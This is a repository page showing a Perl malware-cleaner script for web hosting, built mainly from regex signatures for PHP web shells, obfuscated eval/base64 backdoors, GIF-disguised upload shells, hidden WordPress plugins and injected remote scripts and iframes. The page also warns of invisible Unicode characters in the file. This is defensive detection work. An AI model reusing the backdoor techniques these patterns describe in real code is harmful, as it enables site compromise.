Malin/LP-MSH-Scanner
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
LP-MSH-Scanner/malwaresh.pl
root 755e9112dc fixes
2020-01-27 16:16:19 +01:00

1594 lines
273 KiB
Prolog
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#!/usr/bin/perl
#
# Malware Cleaner Shell Version
#
#
use strict;
use warnings;
use CGI;
BEGIN {
$SIG{__DIE__} = sub {
my $msg = shift;
print "status: 500\n";
print "content-type: text/html\n\n";
$msg =~ s/\n/\0/g;
print "error: $msg\n";
CORE::die $msg;
}
}
$| = 1;
our $q = CGI->new;
print "Content-type: text/html\n\n";
my $user = $ARGV[0];
my @regexen = (
qr/<\?php\s+\/\*\*\s+\* WordPress DB Class.+?\$_REQUEST = array_merge\(\$_GET, \$_POST, \$_COOKIE\);\s+\$auth = \"([A-z0-9_]{1,40})\";\s+\$sname = \@session_name\(\);.+?\$method = \"create\" \. \"_\" \. \"function\";\s+\$decode = \"base\" \. \"64_de\" \. \"code\";\s+\$reverse = \"str\" \. \"rev\";\s+\$decompress = \"gzun\" \. \"compress\";.+?\$action = \$method\(\'\'\, \$data\);\s+\$action\(\);\s+\}\s+\}\s+\}/is,
qr/<\?php \/\*([A-z0-9_]{1,50})\*\/ \?><\?php \$([A-z0-9_]{1,20}) = \".+?\'\' \) , \$([A-z0-9_]{1,20}) \)\)\.\"\'.+?\'\"\.([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\],\$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\]\.\$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\], \$([A-z0-9_]{1,20})\[([A-z0-9_]{1,20})\] \);\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\,array\(\'\'\,\'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\)\);/is,
qr/<script type=\'text\/javascript\' src=\'https:\/\/snippet\.adsformarket\.com\/.+?\.js\?.+?\'<\/script>/is,
qr/var gfjfgjk = 1; var d=document;var s=d\.createElement\(\'script\'\); s\.type=\'text\/javascript\'; s\.async=true;\s+var pl = String\.fromCharCode\(.+?if \(document\.currentScript\) \{\s+document\.currentScript\.parentNode\.insertBefore\(s\, document\.currentScript\);\s+\} else \{\s+d\.getElementsByTagName\(\'head\'\)\[0\]\.appendChild\(s\);\s+\}/is,
qr/<script type=\'text\/javascript\' src=\'https:\/\/snippet\.adsformarket\.com\/same\.js\'><\/script>/is,
qr/<script type=text\/javascript src=\'https:\/\/track\.adsformarket\.com\/t\.js\'><\/script>/is,
qr/<\?php if\(isset\(\$_POST\[chr\(97\)\.chr\(115\)\..+?\@include\(\$a\);\@unlink\(\$a\);die\(\); \} \?>/is,
qr/<\?php function ([A-z0-9_]{1,20})\(\$\w,\$\w,\$\w\)\{return \$\w\.\$\w\.\$\w;\} \$([A-z0-9_]{1,20}) =.+?\(\"at\",chr\(101\),\"\(\\x62a\"\);\$.+?\'\"\.\$([A-z0-9_]{1,20});\$([A-z0-9_]{1,20})\(\'\', \'\}\'\.\$([A-z0-9_]{1,20})\.\'\/\/\'\);/is,
qr/<\?php \$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}\[.+?eval\(\$([A-z0-9]{1,20})\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[([0-9]{1,5})\]\]\);\s+\}\s+exit\(\);\s+\}\s+\}/is,
qr/<\?php\s+\/\/header\(.+?\\x30\"\]\(\);\?>/is,
qr/<\?php\s+\/\/header\(.+?\$([O0_]{1,6})=\(.+?\\x\d\d\"\]\(\);\?>/is,
qr/<\?php\s+\/\/header\(.+?\$([A-z0_]{1,20})=urldecode\(.+?\]\(\);\?>/is,
qr/<\?php\s+if \(isset\(\$\{\"_REQUE\"\.\"ST\"\}\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$([A-z0-9_]{1,20})=\"assert\";\$([A-z0-9_]{1,20})\(\$\{\"_REQUEST\"\}\[\'([A-z0-9_]{1,20})\'\]\);exit;\} \/\/([A-z0-9_]{1,20})\s+if \(!extension_loaded\(\'IonCube_loader\'\)\).+?\?>\s+([A-z0-9_]{50,})\Z/is,
qr/<\?php\s+\$([A-z0_]{1,10})=.+?\$([A-z0_]{1,10})=\'\|hateyou\|\';.+?\$([A-z0_]{1,10})=urldecode\(\"\%.+?\$([A-z0_]{1,10})=\"([A-z0-9_]{20,})\";\?>/is,
qr/\/\/\s+([A-z0-9]{31})\s+echo\s+base64\_decode\(.+?\)\;\s+\/\/([A-z0-9]{31})/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\|.+?\)\)\=\=\$([A-z0-9]{1,20})\)eval\(\$.+?\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\|.+?\)die\;\$.+?\(false\,\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\).+?\'\;/is,
qr/<\?php.+?\$([A-z0-9]{1,20})\=\(([0-9]{1,5})\-([0-9]{1,5})\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}.+?exit\(\)\;\s+\}\Z/is,
qr/<\?php\s+\/\/header\(\'Content\-Type\:text\/html\;.+?\=array\(.+?\=urldecode\(.+?\)\;exit\(\)\;\}\'\)\;\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\]\(\)\;\?>/is,
qr/<\?php.+?\$\{\"\\x47\\x4c\\x4fB\\x41\\x4c\\x53\"\}.+?\?>/is,
qr/<\?php\s+\$\{\"\\x.+?\$\{\"G\\x.+?\$\{\"\\x.+?\$\{\$\{\"G\\x.+?\}\;\}\s+\?>/is,
qr/<\?php\s+\/\*\s+Plugin\s+Name\:\s+antisp.+?add\_filter\(\'all\_plugins\'\,\s+\'ANTISP\_hide\'\)\;/is,
qr/<\?php.+?\;\$\{\"G.+?\;global\$mysqli\;global\$dbHost\;global\$dbUser\;\$.+?\;else\s+return\;break\;\}\}\s+\?>/is,
qr/<script>\s+var\s+\_0xa7af\=\[.+?\]\;eval\(function\(\_0xaddfx1\,\_0xaddfx2\,\_0xaddfx3\,\_0xaddfx4\,\_0xaddfx5\,\_0xaddfx6\)\{.+?\]\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+\/\*\s+Plugin\s+Name\:\s+spamdetectvr.+?add\_filter\(\'all\_plugins\'\,\s+\'SPAMDETECTVR\_hide\'\)\;.+?\/\/\s+\}\s+\/\/\}\)\;/is,
qr/<script\s+type\=\"text\/javascript\">\s+eval\(function\(p\,a\,c\,k\,e\,d\)\{e\=function\(c\)\{return\s+c\.toString\(.+?\.replace\(new\s+RegExp\(.+?script\|insertBefore\'\.split\(\'\|\'\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/\/\/([A-z0-9]{32})\s+create\_function\(\'\'\,\s+gzuncompress\(base64_decode\(.+?\)\)\)\;\s+\/\/([A-z0-9]{32})/is,
qr/<\?php\s+\$\{.+?\;protected\$instance\;protected\$request\;protected\$calls\=array\(\)\;protected\$response\=array\(\)\;protected\$hasCalls\=false\;private\$isBatchCall\=false\;protected\$hiddenMethods\=array\(\'execute\'\,\'\_\_construct\'\).+?\}\s+\?>/is,
qr/<\?php\s+\$\{.+?\]\;\@mail\(.+?\]\}\)\;\$\_SESSION\[.+?\]\}\=curl\_init\(\)\;curl\_setopt\(\$\{\$\{.+?\]\}\,CURLOPT\_RETURNTRANSFER\,1\)\;curl\_setopt\(\$\{\$\{.+?\]\}\}\;\}\}\s+\?>/is,
qr/<\?php\s+\/\*\s+Plugin\s+Name\:\s+Pisher.+?trojan\.25hack.+?\;\}\)\;\}\)\;\s+\?>/is,
qr/\s+<\?php\s+echo\(base64\_decode\(.+?\)\)\;eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;echo\s+\"\\x\d\d\\n\"\;\s+\?>/is,
qr/<\?php\s+echo\s+\"<div\s+align\=\\\"center\\\">.+?if\(isset\(\$\_POST\[\"submit\"\]\)\)\{if\(\$\_FILES\[\"file\"\]\[\"error\"\]>0\)\{echo.+?Go\s+here\s+\:\s+\"\.\$path\.\"<br>\"\;\}\}\s+\?>/is,
qr/<\?php\s+session\_start\(\)\;.+?function\s+login\_shell\(\)\s+\{\s+?>.+?IndoXploit.+?serverinfo\(\)\;\s+action\(\)\;\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?.+?Aldwiry\s+Hack3r.+?\$usrp\s+\=\s+\"jo\/usr\.pl\"\;.+?Error\s+CHMOD\s+\!\"\;\s+\}\s+\?>/is,
qr/<\/br>\"\;\s+session\_start\(\)\;.+?Moshkela\s+Hacker<\/title>.+?\}\/\/\s+end\s+if\s+\}\s+\?>/is,
qr/<\?php\s+\$GLOBALS\[\'DB\_NAME\'\]\s+\=\s+array\(.+?if\(\!function\_exists\(\'bas\'\.\'e\'\.\'64\_\'\.\'en\'\.\'code\'\)\)\{.+?ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.+?\)\;\?>/is,
qr/<\?php\s+\/\*\*\s+\*\s+SAPE\.ru.+?class\s+SAPE\_globals\s+\{.+?\$this\->\_data\[\$this\->\_request\_mode\]\s+\=\s+\$data\;\s+\}\s+\}/is,
qr/<\?php\s+if\s+\(\!defined\(\'\_SAPE\_USER\'\)\)\{\s+define\(\'\_SAPE\_USER\'\,.+?echo\s+\$sape\->return\_links\(\)\;\s+\?>/is,
qr/<\?\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?\$domain\s+\=\s+\'([A-z0-9]{1,20})\.liveupdates\.host\'\;.+?dns\_get\_record\(\$domain\,\s+DNS\_TXT\)\;.+?else\s+header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$\w\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+\@date\_default\_timezone\_set\(.+?GetPageContent\(.+?EXPLOITOK.+?return\s+\(SASL\_CONTINUE\)\;\s+\}\s+\}/is,
qr/<\?php\s+function\s+cURLRequest\(\$url.+?function\s+Display404Page\(\)\s+\{.+?Display404Page\(\)\;\s+\}\s+exit\;\s+\}/is,
qr/<\?php\s+\$o0o\=\_\_FILE\_\_\;\$oOo\=\'.+?\'\;eval\(gzinflate\(base64\_decode\(.+?\'\)\)\)\;\?>/is,
qr/<\?php\s+\$o0O0\s+=.+?\$oO0\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$oO0o\=\@\$oO0\(.+?\?>\"\.gz\'\.\'inf\'\.\'late\'\.\'\(\s+bas\'\.\'e64\'\.\'\_de\'\.\'co\'\.\'de\(.+?\,\$o0O0\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;.+?\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$.+?\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\s+\?>/is,
qr/<\?php\s+\$\w\_\_\_\w\=\'base\'\.\(128\/2\)\.\'\_de\'\.\'code\'\;\$\w\_\_\_\w\=\$\w\_\_\_\w\(str\_replace\(\"\\n\"\,\ \'\'\,.+?<input\s+type\=\"submit\"value\=\"\&gt\;\"\/><\/form>/is,
qr/<\?php\s+set\_time\_limit\(0\)\;.+?Mister\s+Spy<\/title>.+?Upload\s+File.+?\?>\s+bypass.+?contact\@elmoujehidin\.net/is,
qr/<\?php\s+\@\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\"([A-z0-9]{1,20})\"\]\)\)\s+\{\$([A-z0-9]{1,20})\=\"ass\"\.\"ert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\"([A-z0-9]{1,20})\"\]\)\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"ass\"\.\"ert\"\;\s+\$([A-z0-9]{1,20})\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\"([A-z0-9]{1,20})\"\]\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{20,})\=.+?eval\(base64\_decode\(gzuncompress\(base64\_decode\(\$([A-z0-9]{20,})\)\)\)\)\;\s+\?>/is,
qr/<\!DOCTYPE.+?libraries\/joomla\/document\/json\/a\.txt\s+was\s+not\s+found.+?<\/html>/is,
qr/<\?php\s+session\_start\(\)\;.+?\$auth\_pass.+?IndoXploit.+?IndoXploit<\/font><\/a><\/center>\"\;\s+\}\s+\?>\s+<\/html>/is,
qr/<\?php.+?FOPO.+?\$([A-z0-9]{1,20})\=.+?\@eval\(\$([A-z0-9]{1,20})\(\s+\"([A-z0-9]{50,}).+?\"\)\)\;\s+\?>/is,
qr/<SCRIPT\s+SRC\=http\:\/\/w0rms\.com\/sayac\.js><\/SCRIPT>\s+<\?php.+?header\(\'HTTP\/1\.0\s+404\s+Not\s+Found\'\)\;\s+exit\;/is,
qr/<\?php\s+if\s+\(isset\s+\(\$\_GET\[\'.+?\'\]\)\).+?\$default\_use\_ajax\s+\=\s+true\;.+?preg\_replace\(\"\/\.\*\/e\"\,\".+?\"\,\"\.\"\)\;\s+\}\s+else\s+\{\s+echo\s+\"<div\s+style\=display\:none>.+?<\/div>\"\;\s+\}\s+\?>/is,
qr/<\?php\s+WSOCheckUA\(\)\;.+?\$disable\_functions\s+\=\s+\@ini\_get\(.+?if\(\s+\!empty\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\&\&\s+function\_exists\(\'action\'\s+\.\s+\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\s+\)\s+\{\s+call\_user\_func\(\'action\'\s+\.\s+\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\s+\}/is,
qr/<\?php.+?Bypass\s+\.\/Config\s+\.\/User\s+\.\/Domain.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+function\s+wsoHeader\(\)\s+\{.+?\$drives\s+\=\s+\"\"\;.+?<div\s+style\=\"margin\:5\">\'\;\s+\}/is,
qr/<\?php\s+function\s+getBot\(\$url\)\s+.+?echo\s+\"<b>Namesis<br>.+?exit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$\_F\=\_\_FILE\_\_\;\$\_X\=.+?eval\(base64\_decode\(.+?\)\)\;\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?File\s+Manager<\/title>.+?\$pathen\s+\=\s+base64\_encode\(\$path\)\;.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\_\w\s+\=\s+\'\'\.chr\(([0-9]{1,5})\)\.\'\'\.chr\(([0-9]{1,5})\)\.\'([A-z0-9]{1,20})\'\.chr\(([0-9]{1,5})\)\.\'de\'\s+\;\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\_\w\(\'\'\,array\(.+?\)\)\;\$([A-z0-9]{1,20})\(\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'ba\'\s+\,\'se\'\s+\,\'64\'\s+\,\'\_d\'\s+\,\'ec\'\s+\,\'od\'\s+\,\'e\'\)\;.+?array\(\'gzu\'\,\s+\'nco\'\,\s+\'mpr\'\,\s+\'ess\'\).+?eval.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php.+?\'\'\.chr\(.+?\'\.chr\(.+?\(\'\'\,array\(.+?\)\.\'e64\_deco\'\.chr\(.+?\(\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/<\?php\s+header\(\'Content\-Type\:text\/.+?define\(\'SHELL\_PASSWORD\'\,.+?API\_VERSION\,\s+2\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*a\,b\,c\,d\,e\,f\,g\,h\,i\,j\,k\,l\,m\,n\,o\,p\,q\,r\,s\,t.+?\*\/\s+\?>/is,
qr/<\?php.+?\'\.chr\(.+?\)\.\'\'\.chr\(.+?aWYo.+?\(\)\;\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$.+?\)\)\;\?>/is,
qr/<\?php\s+define\(\'EXT\_MYSQLI\'\,\s+\'mysqli\'\)\;.+?\{\s+if\s+\(file\_exists\(sprintf\(\'\%s\/wp\-config\.php\'.+?\s+break\;\s+\}\s+\}\s+else\s+\{\s+die\(\'ympf\'\)\;\s+\}/is,
qr/<\?php\s+\$.+?\=\s+array\(.+?\=\s+array\(\'bas\'\s+\,\'e64\'\s+\,\'\_de\'\s+\,\'cod\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\('g\'\,\s+\'z\'\,\s+\'u\'\,\s+\'n\'\,\s+\'c\'\,\s+\'o\'\,\s+\'m\'\,\s+\'p\'\,\s+\'r\'\,\s+\'e\'\,\s+\'s\'\,\s+\'s\'\)\s+\;\$.+?\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\)\.\'\'\.chr\(.+?\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?eval.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+assert\_options\(ASSERT\_WARNING\,0\)\;.+?function\s+hex2ascii\(\$.+?\'e\'\.\'\'\.\'\'\.\'\'\.\'\'\.\'.+?\.\'\'\.\'\'\.\'\'\.\'v\'\.\'a\'\.\'l\'\.\'\(\$.+?assert\(\$\w\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$([A-z0-9]{1,20})\s+\=\s+\'bas\'\s+\.\'e64\'\s+\.\'\_de\'\s+\.\'cod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?eval.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'g\'\.\s+\'z\'\.\s+\'u\'\.\s+\'n\'\.\s+\'c\'.\s+\'o\'\.\s+\'m\'\.\s+\'p\'\.\s+\'r\'\.\s+\'e\'\.\s+\'s\'\.\s+\'s\'\;\$([A-z0-9]{1,20})\s+\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\@session\_start\(\)\;.+?if\(\$chk\_login\).+?echo\s+\$buff\;\s+\}\s+\?>\s+<\/div>\s+<\/body>\s+<\/html>/is,
qr/GIF89a\?<\?php.+?\$get\.\=chr\(.+?\$undecode\=.+?\$ecode\.\=\s+\$\_REQUEST\[.+?\@eval\(\$undecode\(\$.+?\?>/is,
qr/<title>MCL<\/title><form\s+enctype\=multipart\/form\-data\s+method\=post>.+?<\?\s+echo\s+base64\_decode\(.+?\$fp\=fopen\(base64\_decode\(\$\_REQUEST\[.+?\@copy\(\$\_FILES\[.+?\}\}\;\s+\?>/is,
qr/<\?php\s+\$a\=\"4\"\;\s+\$b\=\"0\"\;\s+\$c\=\"4\"\;\s+echo\s+\$a\.\$b\.\$c\.\"\#\"\;\s+\?>\s+<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\;\s+\$\w\_File\=fopen\(\$\_SERVER\[\'DOCUMENT\_ROOT\'\]\.\"\/1\.txt\"\,\"w\"\)\;\s+if\(\!\$\w\_File\)\s+echo\s+\"writewrong\"\;\s+else\s+echo\s+\"writeok\"\;\s+\?>/is,
qr/GIF89a\s+<\%\s+eval\s+request\(\"([A-z0-9]{1,20})\"\)\%>\s+abcabcabc/is,
qr/GIF89a<\?php\s+\@eval\(\$\_POST\[.+?\$response\s+\=\s+curl\(\$shell\_url\)\;.+?function\s+getcontent\(\$file\)\{.+?return\s+\$tmp\_content\;\s+\}/is,
qr/GIF89a.+?<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\?>/is,
qr/GIF89a<\?PHP\s+fputs\(fopen\(\'([A-z0-9]{1,20})\.php\'\,\'w\'\)\,\'<\?php\s+eval\(\$\_POST\[([A-z0-9]{1,20})\]\)\?>abcabcabc\'\)\;\?>/is,
qr/<\?php\s+echo\s+\'<form\s+action\=\"\".+?\$\_POST\[\'\_\'\]\=\=\"GO\"\)\{if\(\@copy\(\$\_FILES\[.+?Err<\/b>\'\;\}\}\?>/is,
qr/GIF89a\?\s+<\?php.+?\$get\.\=chr\(.+?\$undecode\=.+?\$ecode\.\=\s+\$\_REQUEST\[.+?\@eval\(\$undecode\(\$.+?\?>/is,
qr/\%PDF\-\d\.\d.+?<\?php\s+\@include.+?<title>\'\.getenv\(\"HTTP\_HOST\"\)\.\'\s+\~\s+chmod\.php<\/title>.+?print\s+\$footer\;.+?exit\(\)\;\s+\?>/is,
qr/<\?php\s+\/\/header\(.+?\=urldecode\(.+?\\x\d\d\"\]\(\)\;\?>/is,
qr/<\?\s+eval\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+\$\{\"\\x.+?\;\$\{.+?\;\$\{.+?\;\$\{.+?\;\$\{.+?\;\$\{.+?base64\_decode\(substr\(\$\{\$\{.+?\}\;\}exit\(\)\;\}break\;\}\}\}\}\}\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$.+?\=\s+\'bas\'\s+\.\'e64\'\s+\.\'\_de\'\s+\.\'cod\'\s+\.\'e\'\;\$.+?\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$.+?array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gz\'\.\s+\'un\'\.\s+\'co\'\.\s+\'mp\'\.\s+\'re\'\.\s+\'ss\'\;\$.+?\=\s+\'ba\'\s+\.\'se\'\s+\.\'64\'\s+\.\'\_d\'\s+\.\'ec\'\s+\.\'od\'\s+\.\'e\'\;\$.+?\=\s+\'im\'\s+\.\'pl\'\s+\.\'od\'\s+\.\'e\'\;\$.+?array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$s\_pass\s+\=.+?\$s\_func\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$b374k\=\@\$s\_func\(\'\$x\,\$y\'\,\'ev\'\.\'al\'\.\'\(\"\\\$\s\_pass\=\\\"\$y\\\"\;\?>\"\.gz\'\.\'inf\'\.\'late\'\.\'\(\s+bas\'\.\'e64\'\.\'\_de\'\.\'co\'\.\'de\(\$x\)\)\)\;\'\)\;\@\$b374k\(.+?\$s\_pass\)\;\?>/is,
qr/\?php\s+if\(\s+isset\(\$\_REQUEST\[\"test\_url\"\]\)\s+\)\{\s+echo\s+\"file\s+test\s+okay\"\;.+?\$data\s+\=\s+base64\_decode\(.+?file\_put\_contents\(\"tivuser\.zip\"\,\$data\)\;.+?die\(\"([0-9]{1,20})\"\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=.+?array\(.+?\$([A-z0-9]{1,20})\s+=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\=\s+array\(\'ba\'\s+\,\'se\'\s+\,\'64\'\s+\,\'\_d\'\s+\,\'ec\'\s+\,\'od\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'gzu\'\,\s+\'nco\'\,\s+\'mpr\'\,\s+\'ess\'\)\s+\;\$.+?eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\=\s+array\(\'b\'\s+\,\'a\'\s+\,\'s\'\s+\,\'e\'\s+\,\'6\'\s+\,\'4\'\s+\,\'\_\'\s+\,\'d\'\s+\,\'e\'\s+\,\'c\'\s+\,\'o\'\s+\,\'d\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'gz\'\,\s+\'un\'\,\s+\'co\'\,\s+\'mp\'\,\s+\'re\'\,\s+\'ss\'\)\s+\;\$.+?eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$.+?\=\s+array\(.+?\'esab\'\)\;\$.+?\(\'edo\'\.\'lpm\'\.\'i\'\)\;\$.+?\)\.\'\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/\$z\=get\_option\(\"([A-z0-9]{20,})\"\)\;\s+\$z\=base64\_decode\(str\_rot13\(\$z\)\)\;\s+if\(strpos\(\$z\,\"([A-z0-9]{1,20})\"\)\!\=\=false\)\{\s+\$\_z\=create\_function\(\"\"\,\$z\)\;\s+\@\$\_z\(\)\;\s+\}/is,
qr/function\s+add\_js\_scripts\(\)\s+\{\s+wp\_enqueue\_script\(\'js\-rws\'\,\s+\'http\:\/\/cloudflare\.solutions.+?wp\_enqueue\_script\(\'js\-cors\'\,\s+\'http\:\/\/cloudflare\.solutions\/ajax\/libs\/cors\/cors\.js\'\,\s+\'\'\,\s+null\,\s+true\)\;\s+\}.+?add\_action\(\'login\_enqueue\_scripts\'\,\s+\'add\_js\_scripts\'\s+\)\;/is,
qr/<html><head><meta.+?Mocus7Shell.+?<\?php\s+echo\s+wordwrap\(php\_uname\(\).+?<\/body><\/html><\?php\s+chdir\(\$lastdir\)\;\s+c79shexit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+session\_start\(\)\;.+?\@clearstatcache\(\)\;.+?\$auth\_pass\s+\=.+?eval\(base64\_decode\(gzinflate\(str\_rot13\(convert\_uudecode\(gzinflate\(base64\_decode\(\(\$([A-z0-9]{1,20})\)\)\)\)\)\)\)\)\;/is,
qr/<\!doctype.+?L0LZ666H05T.+?<\/body>\s+<html>/is,
qr/<html>\s+<head>.+?213\_90N6.+?<\/body>\s+<\/html>/is,
qr/<iframe\s+width\=0px\s+height\=0px\s+frameborder\=no\s+name\=frame1\s+src\=http\:\/\/.+?\.ru>\s+<\/iframe>/is,
qr/<\?php\s+\$\{.+?\"\;eval\(base64\_decode\(\$\{\$\{\"G\\x.+?\"\;eval\(base64\_decode\(\$\{\$.+?\}\,CURLOPT\_CONNECTTIMEOUT\,10\)\;curl\_setopt\(\$\{\$\{.+?>\"\;\s+\?>/is,
qr/<\?php.+?x48x\s+Mini\s+Shell\s+Backdoor.+?\@clearstatcache\(\)\;.+?function\s+login\_shell\(\)\s+\{\s+\?>/is,
qr/<\?php\s+\/\*\s+MMM\s+\*\/\$OOO000000\=urldecode\(.+?\}\;\$GLOBALS\[.+?\=\_\_FILE\_\_\;\$.+?\)\)\;return\;\?.+?\=([A-z0-9]{1,20})/is,
qr/<\?php\s+set\_time\_limit\(0\)\;.+?eval\(base64\_decode\(file\_get\_contents\(\'https\:\/\/pastebin\.com\/raw\/.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\$\{.+?\"\;function\s+http\_get\(\$url\)\{\$\{.+?\]\}\=curl\_init\(\$\{\$\{.+?\]\}\,CURLOPT\_RETURNTRANSFER\,1\)\;\$\{\"G.+?\]\}\,CURLOPT\_FOLLOWLOCATION\,1\)\;curl\_setopt\(\$\{\$\{.+?\"\;return\s+curl\_exec\(\$\{\$\{\"GLO.+?\]\}\)\)\$\_POST\[.+?\"\.\$\_POST\[\"\w\"\]\)\;\s+\?>/is,
qr/<html>\s+<head>\s+<title>Shell\s+Helix\s+Sunda\s+Version.+?BConfig\s+Fucker.+?fclose\s+\(\$dosya\)\;\s+\$([A-z0-9]{1,10})\s+\=\'([A-z0-9]{100,}).+?<\/font>\s+<\/footer>\s+<\/html>/is,
